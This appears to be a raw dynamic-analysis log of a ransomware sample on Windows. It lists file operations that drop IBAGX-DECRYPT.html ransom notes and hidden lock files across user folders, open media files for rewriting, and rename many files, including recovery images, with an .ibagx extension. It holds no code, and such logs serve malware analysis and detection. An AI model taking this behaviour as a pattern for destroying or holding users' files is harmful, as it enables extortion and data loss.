Create C:\Users\EEBsYm5\Pictures\_n8q\ZPULn8tVRgR.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\PrintHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\PrintHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Recent\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Recent\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Saved Games\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Saved Games\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Searches\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Searches\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Searches\Everywhere.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\Searches\Indexed Locations.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\SendTo\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\SendTo\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Start Menu\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Start Menu\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Templates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Templates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\EEBsYm5\Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Videos\0N8zSzm7.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\1bH7ALfO kEZ3N0YY.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\1mxHuH2E0pBjqicdI.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\2NvXPx3pbCihi-WvFnA-.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\31BvzJTrn.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\327WDGm.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\4Cqbx5Fnwbw.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\59Ao72gGQ9bLjP.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\5Bt0f83.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\6RpGLPeBYQc.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\7bIVX.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\7MkyA glAhP.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\8-bosCwG.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\8hxgdFxXCLL.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\9ySpKabfl.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\Bm_sAM64w6O.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Videos\bUwQZK-Uk8g7DIOod8.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\CuitW9 F0Xa0.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\gb5-MioxOMQZZ4GpDV.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\IxE2AYbwS_oDO.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\lLhEDAlm.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\lSDxfkKZxJGVIm.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\nxNap_pv2-2Wtn.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\q-5yR9fRS23.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\s1nxHkoplGUBAybekj.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\tl08 cYp6iZl-Yix.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\VzI4RFS_weo9.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\xMCsdSdo1FEHrrY-_.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\ZCLgRDi776KoY.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Downloads\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Downloads\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Favorites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Favorites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Libraries\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Libraries\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Public\Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Music\Sample Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Music\Sample Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Music\Sample Music\Kalimba.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\Sample Music\Sleep Away.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Public\Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Desert.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Koala.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Recorded TV\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Public\Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\Wildlife.wmv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Local\Temp\\pidor.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Move \??\C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi.ibagx source_filename = C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi True 1
Fn
Move \??\C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim.ibagx source_filename = C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml True 1
Fn
